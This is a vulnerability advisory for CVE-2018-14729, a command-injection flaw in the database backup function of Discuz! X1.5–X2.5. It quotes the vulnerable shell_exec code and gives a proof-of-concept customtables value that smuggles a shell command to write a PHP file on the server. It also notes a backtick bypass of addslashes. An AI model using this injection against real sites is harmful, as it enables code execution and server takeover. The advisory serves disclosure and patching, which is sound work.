CVE-2018-14729: Discuz! X1.5 to X2.5 Database Backup RCE (Administrative Privileges Required)


Source: https://github.com/FoolMitAh/CVE-2018-14729/blob/master/Discuz_backend_getshell.md

Description

Discuz! X1.5 to X2.5's database backup function in file source/admincp/admincp_db.php allows remote attackers to execute arbitrary PHP code.

VulnerabilityType Other

Remote Code Execution

Vendor of Product

Tencent

Affected Product Code Base

Discuz X1.5 - X2.5

Attack Type

Remote

Impact Code execution

true

Attack Vectors

Administrative Privileges Required

Has vendor confirmed or acknowledged the vulnerability?

true

Discoverer

MitAh@Chaitin Tech

Detail

Take DiscuzX2.5 for example

source/admincp/admincp_db.php

# line 296
@shell_exec($mysqlbin.'mysqldump --force --quick '.($db->version() > '4.1' ? '--skip-opt --create-options' : '-all').' --add-drop-table'.($_GET['extendins'] == 1 ? ' --extended-insert' : '').''.($db->version() > '4.1' && $_GET['sqlcompat'] == 'MYSQL40' ? ' --compatible=mysql40' : '').' --host="'.$dbhost.($dbport ? (is_numeric($dbport) ? ' --port='.$dbport : ' --socket="'.$dbport.'"') : '').'" --user="'.$dbuser.'" --password="'.$dbpw.'" "'.$dbname.'" '.$tablesstr.' > '.$dumpfile);
# line 281
$tablesstr = '';
foreach($tables as $table) {
    $tablesstr .= '"'.$table.'" ';
}
# line 143
$tables = & $_GET['customtables'];

We can easily control the arg $tablesstr in function shell_exec() to execute code.

POC

change customtables[] = pre_common_admincp_cmenu">aaa; echo '<?php phpinfo(); ?>' > phpinfo.php #

Additional Information

Discuz - 1.5 - 2.0

$tables = $_G['gp_customtables']

use addslashes() to escape, but it still works by `whoami`

Discuz - 3.0 - 3.4

Developers wrote a bug, database backup feature doesn't work. However, the vunl still there.

REFERENCE

All rights reserved. © 2018 VULNSPY